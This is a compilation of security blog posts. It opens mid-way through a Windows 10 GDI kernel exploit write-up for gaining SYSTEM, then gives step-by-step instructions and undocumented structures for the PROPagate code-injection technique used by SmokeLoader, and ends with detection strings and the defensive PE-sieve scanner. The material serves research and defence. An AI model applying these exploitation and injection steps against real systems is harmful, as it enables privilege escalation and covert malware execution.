ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

PE-sieve — Hook Finder is open source tool based on libpeconv.

PE-sieve (previously known as Hook Finder) is open source tool based on libpeconv.
It scans a given process, searching for manually loaded or modified modules. When found, it dumps the modified/suspicious PE along with a report in JSON format, detailing about the found indicators.
Currently it detects inline hooks, hollowed processes, Process Doppelgänging, injected PE files etc. In case if the PE file was patched in the memory, it gives a detailed report about where are the changed bytes (and few other properties).

The tool is under rapid development, so expect frequent updates.

PE-sieve is available in 2 versions – as standalone executable, and as a DLL. The DLL version became a base of my other project: HollowsHunter – that makes an automated scan of all the running processes. More about it in the further part of the post.

Where to get it?

The tool is open-source, available on my github:

  https://github.com/hasherezade/pe-sieve

Usage

It has a simple, commandline interface. When run without parameters, it displays info about the version and required arguments:

When you run it giving a PID of the running process, it scans all the PE modules in its memory (the main executable, but also all the loaded DLLs). At the end, you can see the summary of how many anomalies have been detected of which type.

In case if some modified modules has been detected, they are dumped to a folder of a given process, for example:

Short history & features

Detecting inline hooks and patches

I started creating it for the purpose of searching and examining inline hooks. You can see it in action here (old version):

It not only detects that there IS an anomaly/patch, but also WHERE exactly it is. For each dumped PE where the patches were found, it creates a file with tags, that can be loaded by PE-bear.

Thanks to this, we can easily browse the found hooks and check the code that was overwritten.

For example – in the application presented above, the Entry Point was patched and the execution was redirected to the added, malicious section:

Detecting hollowed processes

Later, I extended it to detect process hollowing etc – and it turned out to be pretty convenient unpacker:

Detecting Process Doppelgänging

In a similar manner, it can detects some other methods of impersonating a processes, for example Process Doppelgänging. The malicious payload is directly dumped and ready to be analyzed:

Recovering erased imports

PE-sieve has an ability to recover erased imports. In order to enable it, deploy it with appropriate option. Example – unpacking manually loaded payloads with imports erased (Emotet):

Future development

The project is still not finished and I have many ideas how to make it better. I am planning to detect not only code modifications, but also other types of hooking, such as IAT and EAT patching.

Some in-memory patches are done by legitimate applications, so, in the future version I will provide capability of whitelisting defined patches.

I am also planning to extend its dumping capabilities against the malicious processes that are trying to defend themselves against dumpers etc.

PE-sieve as a DLL

During the development process I got an idea to make a DLL version of the PE-sieve, so that it can be incorporated in other projects.

Building PE-sieve from sources as a DLL is very easy – you just need to set one CMake option: PE_SIEVE_AS_DLL:

build_as_dll

The PE-sieve DLL exposes a minimalistic API. Two functions are exported:

pe-sieve_func

  1. PESieve_help – displays a short info and the version of the DLL.
  2. PESieve_scan – a typical scan with a given parameters, like in the PE-Sieve.exe

The necessary headers needs to be included from the folder “pe-sieve\include“:

https://github.com/hasherezade/pe-sieve/tree/master/include

I have plans to enrich the API in the future. For now, you can see the PE-sieve DLL in action in the HollowsHunter project.

Ideas? Bugs?

If you noticed bug or have an idea for a useful feature, don’t hesitate to mail me or create a Github issue – I check them regularly:

https://github.com/hasherezade/pe-sieve/issues